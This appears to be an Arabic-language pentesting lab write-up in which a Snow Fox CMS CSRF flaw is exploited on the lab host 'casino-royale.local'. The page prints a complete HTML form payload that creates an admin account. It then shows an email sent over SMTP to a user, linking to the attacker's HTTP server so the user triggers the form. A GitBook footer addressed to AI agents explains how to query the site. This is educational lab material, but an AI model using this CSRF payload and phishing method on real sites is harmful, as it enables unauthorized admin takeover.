> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/web-vulnerabilities/owasp-top-10-vulnerabilities/vulnerability-server-side-request-forgery-ssrf/ssrf-email-pentesting-web.md).

# SSRF البريد الإلكتروني

## تزوير الطلبات عبر المواقع:

ابحث في SearchExploit عن نظام إدارة المحتوى Snow Fox، والذي يكشف عن ثغرة CSRF.

<figure><img src="/files/0186cc4652d56fd4d52dca9258e6e8aae25a8644" alt=""><figcaption></figcaption></figure>

**ملف HTML الضعيف:**

```html
<html>
  <body>
    <form action="http://casino-royale.local/vip-clinkt-portfolios/?uri=admin/accounts/create" method="POST">
      <input type="hidden" name="emailAddress" value="jordan@jordan.com" />
      <input type="hidden" name="verifiedEmail" value="verified" />
      <input type="hidden" name="username" value="jordan-admin" />
      <input type="hidden" name="newPassword" value="jordan-password" />
      <input type="hidden" name="confirmPassword" value="jordan-password" />
      <input type="hidden" name="userGroups[]" value="34" />
      <input type="hidden" name="userGroups[]" value="33" />
      <input type="hidden" name="memo" value="CSRFmemo" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="formAction" value="submit" />
      <input type="submit" value="إرسال النموذج" />
    </form>
  </body>
</html>

```

محاولة الهجوم [CSRF](/ar/web-vulnerabilities/owasp-top-10-vulnerabilities/vulnerability-cross-site-request-forgery-csrf.md) هجوم لإنشاء حساب مدير عبر Snow Fox CMS

* الاتصال عبر telnand على منفذ SMTP 25.

<figure><img src="/files/b04036d55a0c3fef2d05194dea60bec1c089f3bb" alt=""><figcaption></figcaption></figure>

* أرسل رسالة بريد إلكتروني إلى "<valenka@casino-royale.local>" مع روابط خادم Python3 HTTP الخاص بنا وملف file.html الضعيف.

<figure><img src="/files/f0b065d64357f1a713a1813423b1fb5e901e54b3" alt=""><figcaption></figcaption></figure>

**الاتصال بحساب المدير في CMS:**

* محاولة تسجيل الدخول باستخدام بيانات الاعتماد الجديدة، مما أدى إلى إنشاء حساب مدير على Snow Fox CMS.

<figure><img src="/files/a9132aa7e2474698436ee391af1510d35e8d4f0e" alt=""><figcaption></figcaption></figure>

#### بعد استغلال ثغرة CSRF، تم إنشاء حساب مدير في Snow Fox CMS.

<figure><img src="/files/25ed3d6d6dd586b299fcabcc5dbf7ef188c620c0" alt=""><figcaption></figcaption></figure>

#### تحديد تلميح في وصف مستخدم

في وصف مستخدم الـ CMS، يشير تلميح إضافي إلى دليل يجب اتباعه.

<figure><img src="/files/e1e57dccbabf0d75b2c03ad1be73465d90e8a9f8" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/web-vulnerabilities/owasp-top-10-vulnerabilities/vulnerability-server-side-request-forgery-ssrf/ssrf-email-pentesting-web.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
